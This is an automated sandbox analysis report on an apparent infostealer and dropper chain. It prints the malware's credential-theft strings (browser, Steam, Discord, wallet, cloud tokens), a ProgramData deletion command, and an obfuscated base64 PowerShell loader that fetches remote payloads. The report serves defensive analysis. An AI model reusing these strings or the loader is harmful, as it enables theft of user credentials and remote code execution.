Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Section loaded: ntasn1.dll

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: random.exe

Static file information: File size 2165248 > 1048576

Source: random.exe

Static PE information: Raw size of nincghsn is bigger than: 0x100000 < 0x1a4c00

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 5a4a47dccd.exe, 00000021.00000002.2561414607.0000000000410000.00000040.00000001.01000000.00000014.sdmp, 5a4a47dccd.exe, 00000021.00000003.2468246941.00000000047EF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000003.2938226002.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3022837158.0000000000410000.00000040.00000001.01000000.0000001D.sdmp, 8b3fbc1053.exe, 00000039.00000003.2957908777.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3061697464.0000000000410000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 5a4a47dccd.exe, 00000021.00000002.2598016348.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3026402216.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3102238334.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdb source: dDFw6mJ.exe, 00000032.00000000.2785734747.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp, dDFw6mJ.exe, 00000032.00000002.2996317054.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb: source: 8b3fbc1053.exe, 00000039.00000003.2957908777.00000000047FF000.00000004.00001000.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3061697464.0000000000410000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: Bedroom.pdbH^ source: e2b0a87ceb.exe, 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wextract.pdbGCTL source: dDFw6mJ.exe, 00000032.00000000.2785734747.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp, dDFw6mJ.exe, 00000032.00000002.2996317054.00007FF662E99000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: vdr1.pdb source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb%* source: 5a4a47dccd.exe, 00000021.00000002.2561414607.0000000000410000.00000040.00000001.01000000.00000014.sdmp, 5a4a47dccd.exe, 00000021.00000003.2468246941.00000000047EF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 5a4a47dccd.exe, 00000021.00000002.2658338483.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 5a4a47dccd.exe, 00000021.00000002.2598016348.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp, Fe36XBk.exe, 00000038.00000002.3026402216.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, 8b3fbc1053.exe, 00000039.00000002.3102238334.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 5a4a47dccd.exe, 00000021.00000002.2658338483.0000000004A4C000.00000004.00000020.00020000.00000000.sdmp, 5a4a47dccd.exe, 00000021.00000002.2770842966.00000000071CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Bedroom.pdb source: e2b0a87ceb.exe, 00000015.00000002.2611358167.0000000003EF9000.00000004.00000800.00020000.00000000.sdmp, e2b0a87ceb.exe, 00000015.00000000.2384664096.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: Bjkm5hE.exe, 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\random.exe	Unpacked PE file: 0.2.random.exe.650000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Unpacked PE file: 8.2.ae70ca0159.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Unpacked PE file: 31.2.ae70ca0159.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Unpacked PE file: 33.2.5a4a47dccd.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;rsigopyg:EW;wlenxwrp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;rsigopyg:EW;wlenxwrp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Unpacked PE file: 38.2.PAL947G2R107U02V5ZPL.exe.110000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Unpacked PE file: 41.2.FQZHGI4TELUEK712J739LWFDT7.exe.b60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nincghsn:EW;mkllyovg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Unpacked PE file: 42.2.ae70ca0159.exe.1000000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hzdrddah:EW;nesteffg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Unpacked PE file: 56.2.Fe36XBk.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;apuhhdvg:EW;pzrtjeve:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe	Unpacked PE file: 57.2.8b3fbc1053.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ffzeszud:EW;ekbstgwf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ffzeszud:EW;ekbstgwf:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: 88823343d6.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: random[1].exe2.6.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: e2b0a87ceb.exe.6.dr, s1l70P8mWLYDmBOs6L.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: random[3].exe2.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($encoded))Invoke-Expression $decoded@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: $dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o